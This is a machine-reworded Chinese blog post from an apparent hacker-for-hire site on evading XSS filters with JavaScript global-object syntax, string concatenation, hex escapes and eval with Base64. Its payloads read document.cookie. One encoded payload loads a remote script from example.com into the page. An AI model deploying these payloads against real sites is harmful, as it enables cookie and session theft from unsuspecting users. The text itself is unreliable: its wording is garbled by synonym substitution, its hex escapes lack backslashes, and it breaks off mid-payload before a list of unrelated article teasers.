*** 变异小技巧:使用JavaScript全局变量绕过XSS过滤器-黑客接单平台

访客5年前黑客资讯850
什么是JavaScript大局变量? JavaScript大局变量在函数外部声明或运用window方针声明,它能够经过任何函数拜访。 假定你的方针Web应用程序简单遭到映射到JavaScript字符串或JavaScript函数中的XSS的攻。 例如,下面的PHP脚本: echo " var message = 'Hello ".$_GET["name"]."'; alert(message); "; 如你所见,name参数简单遭到进犯,但是在这个示例中,假定Web应用程序有一个过滤器,它阻挠运用正则表达式(如/document[^.]*.[^.]*cookie/)阻挠将“document.cookie”字符串用于任何用户输入,让咱们来看看以下有效载荷: 在这种情况下,能够运用JavaScript大局变量来绕过它。咱们有许多办法能够从window或self方针拜访document.cookie。例如,例如,像window["document"]["cookie"]这样的方针就不会被阻挠。 从上面的示例中能够看出,你乃至能够运用self["alert"]("foo")这样的语法拜访任何JavaScript函数,该函数等于alert("foo");,这种语法为你供给了许多绕过弱过滤器的办法。明显,你简直能够在任何地方运用相似的语法,例如: (/* this is a comment */self/* foo */)[/*bar*/"alert"/**/]("yo") 关于“self”方针 Window.self只读特点回来窗口自身,作为WindowProxy,它能够与窗口方针(即window.self)或独立方针(self)上的点符号一同运用。独立符号的长处是关于非窗口上下文存在相似的表明法,例如在Web Workers中。经过运用self,你不只能够在窗口上下文(self将解析为window.self)的 *** 中引证大局规模,并且还能够在运转上下文(self将解析为WorkerGlobalScope.self)中引证。 你能够从以下方位调用任何JavaScript函数: • window • self • _self • this • top • parent • frames 小技巧1.衔接和十六进制转义序列(Escape Sequence) 绕过WAF规矩的最常见技能便是在或许的情况下运用字符串衔接。关于RCE来说也是如此,即便关于SQLi和JavaScript也是如此。 有许多WAF运用根据JavaScript函数名列表的过滤器,其间许多过滤器会阻挠包括比如alert()或String.fromCharCode()之类的字符串的恳求。因为大局变量,咱们能够运用字符串衔接或十六进制转义序列轻松绕过它们。例如: /* ** alert(document.cookie); */ self["ale"+"rt"](self["doc"+"ument"]["coo"+"kie"]) 绕过过滤器的更杂乱的语法是用十六进制转义序列替换字符串,字符代码小于256的任何字符都能够运用其十六进制表明转义,并运用x转义序列: > console.log("x68x65x6cx6cx6fx2cx20x77x6fx72x6cx64x21") 明显,将“alert”、“document”和“cookie”字符串替换为它们的十六进制表明,能够调用前面看到的大局变量中的任何函数: /* ** alert(document.cookie) */ self["x61x6cx65x72x74"]( self["x64x6fx63x75x6dx65x6ex74"] ["x63x6fx6fx6bx69x65"] ) 小技巧2. Eval和Base64编码的字符串 假如WAF要过滤咱们的输入内容,那么最困难的工作之一便是动态创立并增加一个调用长途JavaScript文件(相似于 Base64和eval()能够协助咱们,特别是假如咱们能够防止将“eval”字符串作为用户输入发送的话。看一下下面的比如: self["x65x76x61x6c"]( self["x61x74x6fx62"]( "dmFyIGhlYWQgPSBkb2N1bWVudC5nZXRFbGVtZW50 c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCk7dmFyI HNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn QoJ3NjcmlwdCcpO3NjcmlwdC5zZXRBdHRyaWJ1dGU oJ3R5cGUnLCAndGV4dC9qYXZhc2NyaXB0Jyk7c2Ny aXB0LnNldEF0dHJpYnV0ZSgnc3JjJywgJ2h0dHA6L y9leGFtcGxlLmNvbS9teS5qcycpO2hlYWQuYXBwZW 5kQ2hpbGQoc2NyaXB0KTs="[1][2]黑客接单网

相关文章

使用osquery进行远程取证-黑客接单平台

Osquery是一个SQL驱动操作体系检测和剖析东西,它由Facebook创立,支撑像SQL句子相同查询体系的各项目标,能够用于OSX和Linux操作体系。别的,osquery是一个多渠道软件,能够安...

一份来源未知的数据,揭秘了OilRig组织的全部信息(下)-黑客接单平台

Webshells Webshell用于与受感染服务器交互。走漏数据中包含了三个webshell,分别为HyperShell、HighShell和Minion,Minion很可能是HighShell的...

东西引荐:Raptor WAF,轻量级WEB使用防火墙

  Raptor是一款选用C言语编写的WEB运用防火墙,运用DFA来阻挠SQL注入、Xss目录遍历等进犯。 编译&装置 $ git clone https://github.com/Cool...

Nmap备忘单:从探究到缝隙使用 Part1

在侦办过程中,信息搜集的初始阶段是扫描。 侦办是什么? 侦办是尽或许多的搜集方针网络的信息。从黑客的视点来看,信息搜集对进犯十分有协助,一般来说能够搜集到以下信息: 电子邮件、端口号、操作体系、运转...

Discuz!ML v.3.X Code Injection Vulnerability Analysis-黑客接单平台

0x1 前语 (Foreword) 原本我今日想学经过剖析下Fastjson反序列化缝隙学习java,还有研讨下php混杂解密和底层hook技能的,可是今日看到在群里看了这篇文章Discuz!ML v...

对DOTNET(.NET)中的歹意长途拜访进程进行剖析(下)

上一篇说到代码会有许多重复,由于它在每个if句子(共有五个if句子,会在下篇讲到)中都会调用一个函数。但是,细节却略有不同,其间给定的办法称号和函数的参数都会显现函数的内容。 第一个if句子在程序会集...